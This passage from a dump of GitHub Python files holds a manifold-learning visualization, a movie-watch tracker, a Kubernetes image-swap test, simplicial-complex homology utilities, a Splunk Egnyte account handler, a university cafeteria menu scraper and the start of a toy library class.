uniform in scale\n :return:\n '''\n import plotly.graph_objects as go\n fig = go.Figure()\n krng = 0.1\n xvec = 0.7\n gz = 0.1\n min_dist = 1E-3\n\n def get_hierarchical_principle_components(dataset, rng):\n dataset_cluster_labels = DBSCAN(eps=0.02, min_samples=5).fit_predict(dataset)\n dataset_clusters = {}\n for i, v in enumerate(dataset_cluster_labels):\n if not v in dataset_clusters:\n dataset_clusters[v] = [[i, dataset[i]]]\n else:\n dataset_clusters[v].append([i, dataset[i]])\n\n pc = [[] for i in range(len(dataset))]\n for c in dataset_clusters:\n clu = dataset_clusters[c]\n clu_emb = [x[1] for x in clu]\n pcc = get_principle_components(clu_emb, rng)\n for i, pos in enumerate([x[0] for x in clu]):\n pc[pos] = pcc[i]\n return np.vstack(pc)\n\n def get_principle_components(dataset, rng):\n axis_cnt = np.shape(dataset)[1]\n pc_bucket = np.zeros_like(dataset)\n\n point_bucket = [[] for x in dataset]\n\n for i in range(len(dataset) - 1):\n cpoint = dataset[i]\n for ii in range(i + 1, len(dataset)):\n npoint = dataset[ii]\n if np.linalg.norm(cpoint - npoint) < rng: # fills 2 clusters simultaneusly\n point_bucket[i].append(npoint)\n point_bucket[ii].append(cpoint)\n # den = np.max([len(x) for x in point_bucket])\n for bi in range(len(point_bucket)):\n if len(point_bucket[bi]) > 0:\n points = np.asarray(point_bucket[bi])\n pc = PCA(n_components=1).fit(np.asarray(points)).components_ # alrddy len 1\n pc_bucket[bi] = pc # * len(point_bucket[bi]) / den\n\n _debug = []\n for i in range(len(dataset)):\n _debug.append(dataset[i])\n _debug.append(dataset[i] + pc_bucket[i] / 10)\n _debug.append([None] * axis_cnt)\n plot_l(_debug)\n return pc_bucket\n\n def rrgb():\n return 'rgb(' + str(np.random.randint(0, 255)) + ',' + str(np.random.randint(0, 255)) + ',' + str(\n np.random.randint(0, 255)) + ')'\n\n def plot_d(dataset, name, htext):\n x = [x[0] for x in dataset]\n y = [x[1] for x in dataset]\n z = [x[2] for x in dataset]\n\n fig.add_trace(go.Scatter3d(\n x=x, y=y, z=z,\n hovertext=htext, name=name, mode='markers', # hoverinfo='text',\n marker=dict(size=6, color=rrgb(), opacity=1) # ,line=dict(width=1, color='black'))\n ))\n return\n\n def plot_l(dataset):\n x = [x[0] for x in dataset]\n y = [x[1] for x in dataset]\n z = [x[2] for x in dataset]\n\n fig.add_trace(go.Scatter3d(\n x=x, y=y, z=z, mode='lines', line=dict(color='red', width=1),\n ))\n return\n\n def get_anomaly_score(point, data, vector_field, score_dist, vector_relative_weightage=0.5, d_angle=15):\n scores = []\n l2 = np.linalg.norm\n neighbours, vectors = [], []\n d_angle_rad = d_angle / 180 * np.pi\n offset = -np.cos(2 * d_angle_rad)\n kp = 1 / (1 + offset)\n kn = -1 / (offset - 1)\n\n def get_manifold_reducer(v, vec):\n angle = get_angle(v, vec)\n vlen = l2(vec)\n vlen_sc = np.power(vlen, 2) # filters for strong directionality\n angle = np.pi / 2 if np.isnan(angle) else angle\n\n a = np.cos(2 * angle) + offset\n angle_factor = kp * a if a > 0 else kn * a\n reducer = angle_factor * vlen_sc\n return reducer\n\n def get_angle(a, b):\n xx = np.dot(a, b) / l2(a) / l2(b) # due to round off errors, value can be >1\n xx = 1.0 if xx > 1 else xx\n return np.arccos(xx)\n\n def _h(point, nei, vec):\n v = nei - point\n l2d = l2(v)\n\n if l2d > min_dist:\n if vec.mean() == 0.0:\n manifold_reducer = 0\n else:\n manifold_reducer = get_manifold_reducer(v, vec)\n # 1 means max reduc, -1 means max increasing score\n dist_rat = l2d / score_dist\n total_reducer = vector_relative_weightage * manifold_reducer + 1 - vector_relative_weightage\n dist_total_reducer = np.tanh(total_reducer / np.power(2.3 * dist_rat, 2))\n if dist_total_reducer < 0:\n dist_total_reducer = 0\n score = 1 - dist_total_reducer\n return score\n else:\n return 0.0\n\n for i, d in enumerate(data):\n v = d - point\n l2d = l2(v)\n if l2d > min_dist:\n if l2d < score_dist * 2:\n neighbours.append(d)\n vectors.append(vector_field[i])\n else:\n return 0.0\n if len(neighbours) == 0:\n return 1.0\n dbsmodel = DBSCAN(eps=0.04, min_samples=5).fit(neighbours)\n _tpoints = {}\n for i, l in enumerate(dbsmodel.labels_):\n if l != -1:\n if not l in _tpoints:\n _tpoints[l] = [[neighbours[i], vectors[i], l2(point - neighbours[i])]]\n else:\n _tpoints[l].append([neighbours[i], vectors[i], l2(point - neighbours[i])])\n else:\n score = _h(point, neighbours[i], vectors[i])\n scores.append(score)\n for k in _tpoints:\n nei = _tpoints[k][np.argmin([x[2] for x in _tpoints[k]])][0]\n vnei = np.asarray([x[1] for x in _tpoints[k]])\n for i in range(len(vnei)):\n if np.dot(vnei[0], vnei[i]) < 0:\n vnei[i] *= -1\n vnei = vnei.mean(axis=0)\n score = _h(point, nei, vnei)\n scores.append(score)\n tscore = np.min(scores) if len(scores) > 0 else 1.0\n tscore = 1 - 1.5 * np.tanh(len(neighbours) / 5) * (1 - tscore)\n if tscore < 0:\n tscore = 0\n return tscore\n\n data = np.asarray(data)\n\n plot_d(data, 'test', data)\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~new points start~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`\n rand_points = []\n rand_scores = []\n nvectors = get_hierarchical_principle_components(data, krng)\n\n for i in [0.3]: # np.arange(0.27, 0.32, 0.01):\n for j in np.arange(0, 1, 0.02):\n for k in np.arange(0, 1, 0.02):\n new_point = [i, j, k]\n score = get_anomaly_score(new_point, data, nvectors, score_dist=gz, vector_relative_weightage=xvec)\n\n rand_scores.append(score)\n rand_points.append(new_point)\n\n # pts = [\n # [0.9, 0.58, 0.76]\n # # [0.3, 0.22, 0.32]\n # ]\n # for new_point in pts:\n # score = get_anomaly_score(new_point, data, nvectors, score_dist=gz, vector_relative_weightage=xname)\n # rand_scores.append(score)\n # rand_points.append(new_point)\n\n # for i in range(3000):\n # new_point = data[np.random.randint(len(data))] + 0.05 * np.random.normal(scale=1, size=3)\n # # new_point = np.random.rand(3)\n # score = get_anomaly_score(new_point, data, nvectors, grid_size=gz, x=xname)\n # if score < 0.9:\n # rand_scores.append(score)\n # rand_points.append(new_point)\n\n x = [x[0] for x in rand_points]\n y = [x[1] for x in rand_points]\n z = [x[2] for x in rand_points]\n\n fig.add_trace(go.Scatter3d(\n x=x, y=y, z=z,\n hovertext=[str(x) for x in rand_scores], name=str(krng) + '-' + str(xvec) + '-' + str(gz), mode='markers',\n marker=dict(size=4, color=np.asarray(rand_scores), opacity=0.7, colorscale='RdYlGn', reversescale=True)\n ))\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~new points end~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`\n\n fig.show()\n return\n\n\ndata = [[0.3, 0.3 + i, 0.4 + i] for i in np.arange(0, 0.3, 0.01)]\n\ndata.append([0.3, 0.36, 0.68])\ndata.append([0.3, 0.5, 0.8])\ndata.append([0.3, 0.5, 0.6])\ndata.append([0.3, 0.6, 0.34])\ndata.append([0.3, 0.74, 0.82])\ndata.append([0.3, 0.96, 0.06])\ndata.append([0.3, 0.96, 0.96])\ndata.append([0.3, 0.98, 0.98])\ndata.append([0.3, 0.92, 0.92])\ndata.append([0.3, 0.88, 0.88])\n\n\ndef data_cross():\n data_cross = [[0.3, 0.3 + i, 0.4 + i] for i in np.arange(0, 0.3, 0.01)]\n data_cross += [[0.3, 0.3 + i, 0.6 - i] for i in np.arange(0, 0.3, 0.01)]\n return data_cross\n\n\ndef data_a():\n data = [[0.3, 0.3 + i, 0.4 + i] for i in np.arange(0, 0.3, 0.01)]\n data += [[0.3, 0.3 + i, 0.7 - i] for i in np.arange(0, 0.07, 0.005)]\n data += [[0.3, 0.33 + i, 0.7 - i] for i in np.arange(0, 0.07, 0.005)]\n data += [[0.3, 0.36 + i, 0.7 - i] for i in np.arange(0, 0.07, 0.005)]\n return data\n\n\n# square\ndata_square = []\nfor ii in np.arange(0, 0.3, 0.02):\n for jj in np.arange(0, 0.3, 0.02):\n data_square += [[0.9, 0.4 + ii, 0.4 + jj]]\n\nmanifold_learning_principle_component(data_a())\n","repo_name":"tanguanhong89/ml_helper","sub_path":"visualizations/manifold_learning_principle_component.py","file_name":"manifold_learning_principle_component.py","file_ext":"py","file_size_in_byte":9288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34372240247","text":"import pickle\nimport csv\nfrom pprint import PrettyPrinter\npp = PrettyPrinter()\n\n\nf=open(\"cagewatch.txt\")\ncagewatched = []\nfor row in csv.reader(f):\n cagewatched.append(row)\nprint(cagewatched)\n#with open('cagewatch.txt') as f:\n# watched = f.read().splitlines()\n\n\n\n\n#\nwith open('cagemovies.pickle', 'rb') as handle:\n b = pickle.load(handle)\n\ncagedict = b\n#pp.pprint(b)\nfor movie in cagewatched:\n try:\n #print(movie[0])\n movieS = movie[0]\n cagedict[movieS]['watched'] = 'yes'\n cagedict[movieS]['watchdate'] = movie[1]\n except KeyError:\n print('KeyError' + movieS)\n\npp.pprint(cagedict)\n\nwith open('cagewatched.pickle', 'wb') as handle:\n pickle.dump(cagedict, handle, protocol=pickle.HIGHEST_PROTOCOL)\n","repo_name":"brahbby/Cam3r0np03","sub_path":"cagedataupdate.py","file_name":"cagedataupdate.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35498500205","text":"#!/usr/bin/env python3\n\nfrom kubernetes import client, config, utils\nfrom datetime import datetime\nimport re\nimport yaml\n\ndef get_mapped_image(image, rules):\n z_xx_io = re.match(\"^(.*?\\.io)\\/.*$\", image)\n z_two_slash = re.match(\"^.*?\\/.*?\\/.*$\", image)\n if not z_xx_io and not z_two_slash:\n image = \"docker.io/\" + image\n z = re.match(\"^(.*?)\\/(.*?)\\/(.*)$\", image)\n if z:\n registry = z.group(1)\n repo = z.group(2)\n image_name = z.group(3)\n swapped_registry = rules.get(registry, rules.get(\"default\", \"\"))\n swapped_registry = registry if swapped_registry == \"\" else swapped_registry\n swapped_image = \"/\".join([swapped_registry, repo, image_name])\n return swapped_image\n z = re.match(\"^(.*?)\\/(.*)$\", image)\n if z:\n registry = z.group(1)\n image_name = z.group(2)\n if registry == \"k8s.gcr.io\":\n swapped_registry = rules.get(registry, rules.get(\"default\", \"\"))\n else:\n swapped_registry = rules.get(registry + \"/library\", rules.get(\"default\", \"\"))\n swapped_registry = registry if swapped_registry == \"\" else swapped_registry\n swapped_image = \"/\".join([swapped_registry, image_name])\n return swapped_image\n\ndef get_rules():\n rules = {}\n with open(\"imageswap.yaml\", \"r\") as stream:\n for doc in yaml.safe_load_all(stream):\n if doc[\"metadata\"][\"name\"] == \"imageswap-maps\":\n for line in filter(None, doc[\"data\"][\"maps\"].split(\"\\n\")):\n rules[line.split(\"::\")[0]] = line.split(\"::\")[1]\n return rules\n\nRULES = get_rules()\n\nconfig.load_kube_config()\nv1 = client.CoreV1Api()\n\nNAMESPACE = \"imageswap-test-\" + datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n\nprint(\"create namespace: {}\".format(NAMESPACE))\nmetadata = {\n \"name\": NAMESPACE,\n \"labels\": {\n \"k8s.twr.io/imageswap\": \"enabled\",\n }\n}\nv1.create_namespace(body={\"metadata\": metadata})\n\n# create\nORIGIN_IMAGES=[\n 'nginx',\n 'bitnami/nginx',\n 'docker.io/nginx',\n 'docker.io/bitnami/nginx',\n 'index.docker.io/nginx',\n 'index.docker.io/bitnami/nginx',\n 'gcr.io/arrikto/nginx',\n 'k8s.gcr.io/scheduler-plugins/controller:v0.23.10',\n 'ghcr.io/linuxcontainers/nginx',\n 'quay.io/minio/minio',\n 'registry.k8s.io/scheduler-plugins/controller:v0.25.7',\n 'localhost:5000/vmware/kube-rbac-proxy:0.0.1',\n \"docker.io/kubeflownotebookswg/poddefaults-webhook\",\n \"gcr.io/kubebuilder/kube-rbac-proxy:v0.4.0\",\n \"gcr.io/ml-pipeline/cache-deployer:2.0.0-alpha.3\",\n \"docker.io/istio/proxyv2:1.14.1\",\n \"gcr.io/knative-releases/knative.dev/serving/cmd/queue@sha256:14415b204ea8d0567235143a6c3377f49cbd35f18dc84dfa4baa7695c2a9b53d\",\n \"gcr.io/knative-releases/knative.dev/serving/cmd/domain-mapping@sha256:23baa19322320f25a462568eded1276601ef67194883db9211e1ea24f21a0beb\"\n]\n\nfor index, name in enumerate(ORIGIN_IMAGES):\n print(\"create pod with image: {}\".format(name))\n pod = client.V1Pod()\n pod.metadata = client.V1ObjectMeta(name=\"test-pod-\" + str(index))\n container = client.V1Container(name=\"my-container-\" + str(index), image=name)\n pod.spec = client.V1PodSpec(containers=[container])\n v1.create_namespaced_pod(namespace=NAMESPACE, body=pod)\n\ninput(\"Press Enter to check results and delete testing resources...\")\n\n# sleep\nfor index, name in enumerate(ORIGIN_IMAGES):\n pod = v1.read_namespaced_pod(name=\"test-pod-\" + str(index), namespace=NAMESPACE)\n swapped_name = pod.spec.containers[0].image\n print(index)\n if swapped_name == get_mapped_image(name, RULES):\n print(\"✅[Passed]\")\n else:\n print(\"❌[Failed]\")\n print(\"- original: {}\".format(name))\n print(\"- swapped: {}\".format(swapped_name))\n print(\"- phase: {}\".format(pod.status.phase))\n\n# delete namespace\nbody = client.V1DeleteOptions()\nv1.delete_namespace(name=NAMESPACE, body=body)","repo_name":"xujinheng/imageswap-webhook-proxycache","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39593492679","text":"import math\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom SimplicialComplex.utils.matrices_utils import elementary_divisors\n\n\nclass InvalidSimplicialComplexException(Exception):\n def __init__(self, message):\n super().__init__(message)\n self.my_message = message\n\n\ndef validate_subfaces(sub_faces_set, faces):\n for sub_face in sub_faces_set:\n for face in faces:\n if set(face) == set(sub_face) and face != sub_face:\n raise InvalidSimplicialComplexException(\n f\"La cara {sub_face} no tiene la misma orientación que la cara {face}.\")\n\n\ndef sort_faces(faces: list | set | tuple) -> list:\n \"\"\"\n Sorts the list of faces following lexicographic and faces length.\n Args:\n faces (list | set | tuple): set of faces of a Simplicial Complex\n Returns:\n list: ordered list of faces\n \"\"\"\n # faces.remove(())\n return sorted(faces, key=lambda a: (a, len(a)))\n\n\ndef reachable(edges: list | set | tuple, vert: int, visited_vertex: dict) -> list:\n \"\"\"\n Returns a list with the reachable vertex from the given vertex in a graph.\n Args:\n edges (list | set | tuple): list of edges\n visited_vertex (dict): dict with the visited vertex\n vert (int): entry vertex to get the list of reachable vertex\n Returns:\n list: list of reachable vertex from the given vertex\n \"\"\"\n reach = [vert]\n visited_vertex[vert] = True\n for edge in edges:\n if vert in edge:\n end_vert = tuple(x for x in edge if x != vert)[0]\n if not visited_vertex[end_vert]:\n reach = reach + reachable(edges, end_vert, visited_vertex)\n return reach\n\n\ndef sub_faces(face: list | set | tuple) -> set:\n \"\"\"\n Computes the sub-faces of the given face.\n Args:\n face (list | set | tuple): tuple of vertex\n Returns:\n set: set with all sub faces\n \"\"\"\n sub_faces_set = set()\n for vert in face:\n sub_face = tuple(x for x in face if x != vert)\n sub_faces_set.add(sub_face)\n sub_faces_set = sub_faces_set.union(sub_faces(sub_face))\n return sub_faces_set\n\n\ndef update_faces_dict(dic_target: dict, faces: list | set | tuple, float_value: float) -> dict:\n \"\"\"\n Update the dictionary of faces with the new given faces.\n Args:\n dic_target (dict): dict\n float_value (float):\n faces (list | set | tuple): list/set of tuples\n\n Returns:\n dict: faces with the faces given and the value\n \"\"\"\n dic = dic_target.copy()\n for face in faces:\n if face not in dic or dic[face] > float_value:\n dic[face] = float_value\n return dic\n\n\ndef sort_vertex(faces: list | set | tuple) -> set:\n \"\"\"\n Sorts the faces in lexicographic order.\n Args:\n faces (list | set | tuple):\n Returns:\n set: sorted faces set\n \"\"\"\n sorted_faces = set()\n for x in faces:\n sorted_faces.add(tuple(sorted(list(x), key=lambda a: a)))\n return sorted_faces\n\n\ndef filter_by_float(dic: dict, value: float) -> set:\n \"\"\"\n Returns a set of faces which float value is less than the given one.\n Args:\n dic (dict): dict\n value (float): Float value\n Returns:\n set: faces which float value is less than the given value\n \"\"\"\n return {x for x in dic.keys() if dic[x] <= value}\n\n\ndef check_if_sub_face(sub_face: tuple, super_face: tuple) -> bool:\n \"\"\"\n Check if a tuple represents a sub-face of another tuple.\n Args:\n super_face (tuple): A tuple representing a face.\n sub_face (tuple): A tuple representing a face.\n\n Returns:\n bool: A boolean indicating whether `sub_face` is a sub-face of `super_face`.\n \"\"\"\n if len(sub_face) != len(super_face) - 1 or len(sub_face) == 0:\n return False\n return set(sub_face).issubset(set(super_face))\n\n\ndef boundary_operator(sub_face: tuple, super_face: tuple) -> bool:\n \"\"\"\n Checks if the given sub-face is a sub-face of the given super-face, and returns the sign of the\n corresponding face map if so.\n\n Args:\n sub_face (tuple[int]): A tuple representing the vertices of the sub-face.\n super_face (tuple[int]): A tuple representing the vertices of the super-face.\n\n Returns:\n int: If the sub-face is a sub-face of the super-face, returns either -1 or 1 depending on the relative\n orientation of the sub-face with respect to the super-face. If the sub-face is not a directed sub-face of the\n super-face, returns 0.\n \"\"\"\n if not check_if_sub_face(sub_face, super_face):\n return 0\n for i, (a, b) in enumerate(zip(sub_face, super_face)):\n if a != b:\n if a == super_face[i + 1]:\n return (-1) ** i\n return (-1) ** (i + 1)\n return (-1) ** (len(sub_face))\n\n\ndef noise(points: np.array) -> np.array:\n \"\"\"\n Add noise to an array of points.\n Args:\n points (np.array): An array of points, with shape (n, 2) where n is the number of points\n Returns:\n np.array: A new array of points with shape (n, 2), where each point has been perturbed by noise\n \"\"\"\n mean = sum([math.sqrt(p[0] ** 2 + p[1] ** 2) for p in points]) / len(points)\n return np.array([np.array(p) + np.random.normal(mean, 0.1, size=2) for p in points])\n\n\ndef connected_components(complex_faces: set) -> int:\n \"\"\"\n Returns number of connected components of the SimplicialComplex.\n Args:\n complex_faces (set): the faces of the complex\n Returns:\n int: number of connected components\n \"\"\"\n vertex = [x[0] for x in complex_faces if len(x) == 1]\n edges = [x for x in complex_faces if len(x) == 2]\n # Build a visited vertex dictionary\n visited_vertex = {x: False for x in vertex}\n # For each vertex, compute its component\n components = set()\n for vert in vertex:\n if not visited_vertex[vert]:\n reachable_list = sorted(reachable_alg(edges, vert, visited_vertex), key=lambda a: a)\n components.add(tuple(reachable_list))\n return len(components)\n\n\ndef reachable_alg(edges: list | set | tuple, vert: int, visited_vertex: dict) -> list:\n \"\"\"\n Returns a list with the reachable vertex from the given vertex.\n Args:\n edges (list | set | tuple): list of edges\n visited_vertex (dict): dict with the visited vertex\n vert (int): entry vertex to get the list of reachable vertex\n Returns:\n list: list of reachable vertex from the given vertex\n \"\"\"\n reach = [vert]\n visited_vertex[vert] = True\n for edge in edges:\n if vert in edge:\n tup = tuple(x for x in edge if x != vert)\n end_vertex = tup[0]\n if not visited_vertex[end_vertex]:\n reach = reach + reachable(edges, end_vertex, visited_vertex)\n return reach\n\n\ndef num_loops(complex_faces: set) -> int:\n \"\"\"\n Computes the number of loops in the complex.\n Args:\n complex_faces (set): the faces of the complex\n\n Returns:\n int: the number of loops\n \"\"\"\n edges = set(face for face in complex_faces if len(face) == 2)\n loops = set()\n\n for edge1 in edges:\n for edge2 in edges.difference({edge1}):\n for edge3 in edges.difference({edge1, edge2}):\n if len({edge1[0], edge1[1], edge2[0], edge2[1], edge3[0], edge3[1]}) == 3:\n loop = sorted({edge1[0], edge1[1], edge2[0], edge2[1], edge3[0], edge3[1]}, key=lambda a: a)\n loops.add(tuple(loop))\n\n return len(loops)\n\n\ndef num_triangles(complex_faces: set) -> int:\n \"\"\"\n Computes the number of triangles in the complex.\n Args:\n complex_faces (set): the faces of the complex\n\n Returns:\n int: the number of triangles\n \"\"\"\n return len([x for x in complex_faces if len(x) == 3])\n\n\ndef calc_homology(complex_faces: object) -> tuple[int, int, int]:\n \"\"\"\n Computes the homology of the complex.\n Args:\n complex_faces (set): the faces of the complex\n\n Returns:\n tuple[int, int, int]: the number of connected components, number of triangles and number of loops\n \"\"\"\n return connected_components(complex_faces), num_loops(complex_faces), num_triangles(complex_faces)\n\n\ncolors = [\"b\", \"g\", \"r\", \"m\", \"y\", \"b\", \"g\", \"r\", \"m\", \"y\"]\n\n\ndef plot_persistence_diagram(points: dict, infinite: int) -> None:\n \"\"\"\n Plot the persistence diagram of a set of points.\n Args:\n points (dict): A dictionary where the keys are integers representing the dimension of the points,\n and the values are lists of points\n infinite (int): The maximum value to be plotted on the x and y axis\n Returns:\n None\n \"\"\"\n # Plot all points of the diagram\n for dim, points_list in points.items():\n points_list = np.array([np.array(point) for point in points_list])\n plt.plot(points_list[:, 0].tolist(), points_list[:, 1].tolist(), colors[dim % len(colors)] + \"o\")\n # Plot axis\n plt.axis([-0.1 * infinite, infinite * 1.1, -0.1 * infinite, infinite * 1.1])\n plt.plot([-0.1 * infinite, infinite * 1.1], [-0.1 * infinite, infinite * 1.1], \"b--\")\n plt.plot([-0.1 * infinite, infinite * 1.1], [infinite, infinite], \"b--\")\n\n\ndef plot_barcode_diagram(points: dict) -> None:\n \"\"\"\n Plot the barcode diagram of a set of points.\n Args:\n points (dict): A dictionary where the keys are integers representing the dimension of the points,\n and the values are lists of points\n Returns:\n None\n \"\"\"\n # Plot all bars of the diagram\n height = 0\n for dim, points_list in points.items():\n for point in points_list:\n if point[0] != point[1]:\n plt.plot([point[0], point[1]], [height, height], colors[dim])\n height += 1\n\n\ndef build_homology_string(betti: int, group: int | str, mp_1: np.matrix) -> str:\n \"\"\"\n Build a LaTeX string describing the homology groups of the simplicial complex.\n Args:\n betti (int): The Betti number of the simplicial complex up to the specified degree.\n group (optional): The coefficients used to compute the homology. If None, uses the integers (Z) as coefficients.\n If 'Q', uses the rationals (Q) as coefficients. Otherwise, uses the integers modulo group.\n mp_1: The Smith normal form of the boundary matrix up to the specified degree.\n Returns:\n str: A LaTeX string describing the homology groups of the simplicial complex up to the specified degree, with\n coefficients in the specified group.\n \"\"\"\n if group is None:\n group = '\\\\mathbb{Z}'\n elif group == 'Q':\n group = '\\\\mathbb{Q}'\n else:\n group = '\\\\mathbb{Z}_{' + f'{group}' + \"}\"\n homology = \"\"\n if betti == 1:\n homology += f\"{group}\"\n elif betti != 0:\n homology += f\"{group}^\" + \"{\" + f\"{betti}\" + \"}\"\n for num in elementary_divisors(mp_1):\n if homology != \"\":\n homology += \"\\\\oplus\"\n homology += \"\\\\mathbb{Z}_{\" + f\"{num}\" + \"}\"\n if homology == \"\":\n homology = \"0\"\n return homology\n","repo_name":"JLDEMIGUEL/Topologia","sub_path":"SimplicialComplex/utils/simplicial_complex_utils.py","file_name":"simplicial_complex_utils.py","file_ext":"py","file_size_in_byte":11172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25618705776","text":"from splunk_aoblib.rest_migration import ConfigMigrationHandler\r\nfrom splunktaucclib.rest_handler.endpoint import SingleModel\r\nfrom copy import deepcopy\r\nfrom splunk import rest\r\nACCOUNT_STANZA_NAME = None\r\nAPP_NAME = \"TA-egnyte-connect\"\r\n\r\nclass AccountModel(SingleModel):\r\n \"\"\"Account Model.\"\"\"\r\n\r\n def validate(self, name, data, existing=None):\r\n \"\"\"To get stanza name for future use as it can only be retrive from here.\"\"\"\r\n global ACCOUNT_STANZA_NAME, INDEX_NAME, ENDPOINT\r\n ACCOUNT_STANZA_NAME = name\r\n INDEX_NAME = data.get(\"index\", \"main\")\r\n ENDPOINT = data.get(\"egnyte_domain\", \"\")\r\n super(AccountModel, self).validate(name, data, existing)\r\n\r\nclass AccountHandler(ConfigMigrationHandler):\r\n \"\"\"Account Handler.\"\"\"\r\n\r\n def handleCreate(self, confInfo):\r\n \"\"\"Handle creation of account in config file.\"\"\"\r\n super(AccountHandler, self).handleCreate(confInfo)\r\n self.create_inputs()\r\n\r\n def create_inputs(self):\r\n \"\"\"Create given types of inputs into inputs.conf file.\"\"\"\r\n\r\n modular_input_name = \"egnyte_connect\"\r\n input_type_list = [\"FILE_AUDIT\",\"PERMISSION_AUDIT\",\"LOGIN_AUDIT\", \"USER_AUDIT\",\"WG_SETTINGS_AUDIT\", \"GROUP_AUDIT\", \"WORKFLOW_AUDIT\"]\r\n for i in input_type_list:\r\n if i == \"WG_SETTINGS_AUDIT\":\r\n input_stanza = {\r\n \"name\": \"{}://{}_{}\".format(modular_input_name, ACCOUNT_STANZA_NAME, \"CONFIGURATION_AUDIT\"),\r\n \"global_account\": ACCOUNT_STANZA_NAME,\r\n \"disabled\": \"true\",\r\n \"egnyte_domain_url\": ENDPOINT,\r\n \"index\": INDEX_NAME,\r\n \"data_type\": i\r\n }\r\n else:\r\n input_stanza = {\r\n \"name\": \"{}://{}_{}\".format(modular_input_name, ACCOUNT_STANZA_NAME, i),\r\n \"global_account\": ACCOUNT_STANZA_NAME,\r\n \"disabled\": \"true\",\r\n \"egnyte_domain_url\": ENDPOINT,\r\n \"index\": INDEX_NAME,\r\n \"data_type\": i\r\n }\r\n\r\n # Using Splunk internal API to create default input\r\n try:\r\n rest.simpleRequest(\r\n \"/servicesNS/nobody/{}/configs/conf-inputs\".format(\r\n APP_NAME),\r\n self.getSessionKey(),\r\n postargs=input_stanza,\r\n method=\"POST\",\r\n raiseAllErrors=True,\r\n )\r\n\r\n except Exception as e:\r\n if \"409\" in str(e):\r\n e = \"Account is created but Inputs are not created for it because inputs are still present for same account\\\r\n name. Please close this dialog box and remove the previously created inputs and create new.\"\r\n raise Exception(e)","repo_name":"egnyte/collaborate-for-splunk","sub_path":"TA-egnyte-connect/bin/egnyte_connect_utils_account.py","file_name":"egnyte_connect_utils_account.py","file_ext":"py","file_size_in_byte":2923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4146377965","text":"import requests, re, datetime\n\nfrom bs4 import BeautifulSoup as bs\nfrom base64 import b64decode as dec\n\nLOCATION = {\n \"죽전\": {\n \"교직원식당\": \"555\",\n \"학생식당\": \"556\",\n \"기숙사식당\": \"557\"\n },\n\n \"천안\": {\n \"교직원식당\": \"560\",\n \"학생식당\": \"561\",\n \"기숙사식당\": \"562\"\n }\n}\n\n\ndef requestFoodMenu(event):\n \"\"\"\n 캠퍼스 내 식당 메뉴 정보를 가져옵니다. \\n\n (캠퍼스 내에 존재하지 않는 식당을 가져올 경우, 오류 발생) \\n\\n\n\n 식단 정보는 최근 7일 까지만 크롤링이 가능합니다\n\n :type event: JSON\n :param event: ``{ location: { campus: 캠퍼스 이름, restaurant: 식당 이름 } }``\n :return: 요청 성공 여부와 메시지를 JSON 형태로 전달\n ``{ result: { success: 요청 여부, message: 식단 메뉴 정보 메시지 } }``\n \"\"\"\n\n campus = event['location']['campus']\n restaurant = event['location']['restaurant']\n\n now = datetime.datetime.now()\n\n year = now.year\n weekofyear = now.isocalendar()[1]\n weekday = now.weekday() + 1\n\n LINK_HEAD = dec(b'aHR0cHM6Ly93d3cuZGFua29vay5hYy5rci93ZWIva29yLy0=').decode('utf-8')\n LINK_TAIL = dec(b'P3BfcF9pZD1Gb29kX1dBUl9mb29kcG9ydGxldCZwX3BfbGlmZWN5Y2xlPTAmcF9wX3N0YXRlPW5vcm1hbCZwX3BfbW9kZT12aWV3JnBfcF9jb2xfaWQ9Y29sdW1uLTImcF9wX2NvbF9wb3M9MiZwX3BfY29sX2NvdW50PTMmX0Zvb2RfV0FSX2Zvb2Rwb3J0bGV0X2FjdGlvbj12aWV3').decode('utf-8')\n SITE_LINK = LINK_HEAD + LOCATION[campus][restaurant] + LINK_TAIL\n\n # Form Data\n form_data = {\n \"_Food_WAR_foodportlet_sYear\": year,\n \"_Food_WAR_foodportlet_sWeekOfYear\": weekofyear\n }\n\n # HTTP POST Requests\n dku_req = requests.post(url=SITE_LINK, data=form_data)\n\n # HTML Source\n dku_html = dku_req.text\n\n # BeautifulSoup\n dku_soup = bs(dku_html, features='html5lib')\n\n # Menu Code\n # 1 = Mon, 2 = Tue, 3 = Wed, 4 = Thu, 5 = Fri, 6 = Sat\n dku_soup_request = dku_soup.find_all('tr')[weekday]\n\n # Menu Tables\n dku_soup_table = str(dku_soup_request.find_all('td')[1]).replace('
', '\\n').replace('<', '[').replace(\n '>', ']').replace('amp', '')\n\n # Final response\n dku_soup_remove_tag = re.sub('td', '', dku_soup_table, 0, re.I | re.S)\n dku_soup_response = re.sub('[/<>;\\\\\\]', '', dku_soup_remove_tag, 0, re.I | re.S)\n\n result = {\n \"success\": \"true\"\n }\n\n if dku_soup_response == \" \":\n result['message'] = \"식단 메뉴가 존재하지 않습니다. \\n(방학 중이거나 식당이 운영 중이지 않을 수 있습니다.)\"\n else:\n result['message'] = dku_soup_response\n\n return result\n\n","repo_name":"NEONKID/DLUGBot","sub_path":"functions/dkufood.py","file_name":"dkufood.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26928461580","text":"class library:\n \n # def __init__(self,list):\n # self.books=list\n \n def borrowbook(self,bookname): \n self.book=bookname\n print('The Book is been issued to you , Please return it in 30 days')\n \n \n\nclass student:\n\n def returnbook(self,bookname):\n self.book=bookname\n print('Thanks for returning the book, Hope you enjoyed reading it')\n\ncentral_library=library()\ncentral_library.lib=['clrs','Algorithm','The Jungle 